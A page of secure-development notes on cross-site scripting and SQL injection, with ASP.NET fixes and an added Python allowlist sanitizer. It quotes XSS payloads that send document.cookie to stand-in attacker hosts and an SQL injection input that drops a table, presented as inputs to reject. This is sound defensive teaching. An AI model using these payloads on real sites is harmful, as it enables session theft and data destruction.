Security Development Lifecycle (SDL)
Type: Public  |  Created: 2012-06-11  |  Frozen: Yes
Comments
  • Cross-site scripting attacks = XSS. XSS vulnerabilities are currently known as three types:
    1. Reflected XSS (Type-1 XSS): a page reflects attacker-supplied data directly back to the victim.
    2. Stored XSS (Type-2 XSS): an input system accepts hostile data and stores it in a file, database, or other back-end system.
    3. Local XSS (Type-0 XSS, Document Object Model-based XSS): attacks client-side JavaScript code and variables.
    Fix: validate input, encode output.
    2012-06-11 07:42
  • INPUT: Input can be from a web page or from somewhere else in the system. Ex: page text box inputs. Ex: input data is in a file that is uploaded.
    1) Do not allow these kinds of inputs:
       FirstName <a href="javascript:document.location='http://plan1.Attack.com/'+document.cookie">DON</a>
       FirstName <b onmouseover="document.location = 'http://plan2.Attack.com/' + document.cookie">DON</b>
       www.Somesite.com?plan3=<script>MaliciousScript()</script>
    2) Typically (at most) allow only these tags, but without attributes (deny attributes):
       <b>, <blockquote>, <br>, <div>, <em>, <i>, <li>, <ol>, <p>, <strong>, <u>, <ul>
       Use RegularExpressionValidators.
    3) Page-level validation fix for ASP.NET pages:
       <%@ Page ValidateRequest="true" %>
       Validation fix across pages, in web.config:
       <configuration>
         <system.web>
           <pages validateRequest="true"/>
         </system.web>
       </configuration>
    Encode output: use HtmlEncode when displaying any data, or use AntiXSS.HtmlEncode(Request.QueryString["name"]):
       Hello, <%= AntiXSS.HtmlEncode(Request.QueryString["name"]) %>
    2012-06-11 07:43
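As an added example, not code from the comment above or from the ASP.NET AntiXSS library: a Python sanitizer that applies the comment's allowlist rule, keeping only the listed tags with all attributes dropped and HTML-encoding every other tag and all text (the AllowlistSanitizer class and sanitize function are names of my own choosing). Fed the inputs quoted above, it returns the <b> element stripped of its onmouseover handler and the <a> and <script> markup as inert escaped text.

```python
from html import escape
from html.parser import HTMLParser

# Allowlist from the comment above; every attribute on these tags is dropped.
ALLOWED_TAGS = {"b", "blockquote", "br", "div", "em", "i", "li", "ol",
                "p", "strong", "u", "ul"}
VOID_TAGS = {"br"}  # allowed tags that never take a closing tag


class AllowlistSanitizer(HTMLParser):
    """Re-emits allowlisted tags bare and HTML-encodes everything else;
    comments, doctypes and processing instructions are dropped by default."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open = []  # stack of allowed tags awaiting their close tag

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")  # attributes deliberately discarded
            if tag not in VOID_TAGS:
                self.open.append(tag)
        else:
            # Disallowed tag: encode its raw text so the browser shows it as text.
            self.out.append(escape(self.get_starttag_text(), quote=True))

    handle_startendtag = handle_starttag  # <br/> is treated like <br>

    def handle_endtag(self, tag):
        if tag in self.open:
            # Close any tags opened after this one so the output stays well-formed.
            while (t := self.open.pop()) != tag:
                self.out.append(f"</{t}>")
            self.out.append(f"</{tag}>")
        elif tag not in ALLOWED_TAGS:
            self.out.append(escape(f"</{tag}>", quote=True))

    def handle_data(self, data):
        # convert_charrefs decoded entities for us; re-encode on output.
        self.out.append(escape(data, quote=True))

    def result(self):
        self.out.extend(f"</{t}>" for t in reversed(self.open))
        return "".join(self.out)


def sanitize(untrusted_html):
    p = AllowlistSanitizer()
    p.feed(untrusted_html)
    p.close()
    return p.result()
```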
  • SQL injection vulnerabilities are known in three different types:
    First order: a page constructs SQL statements based on the attacker-supplied data. Ex: user input for customerid is "125 ; drop table customers" instead of "125", so the SQL turns out to be
       select * from customers where custid=125 ; drop table customers
    instead of
       select * from customers where custid=125
    Second order: the attacker submits hostile data through a web page that stores it in a file, database, or other data store. Nothing happens immediately, but expect an unexpected SQL statement to get executed in a SQL job, or any fortnightly job which gets executed on the data.
    Truncation vulnerabilities: the attacker uses varying buffer lengths to truncate a delimited string and uses another input value to inject his commands of choice into a dynamically constructed SQL statement.
    2012-06-11 07:54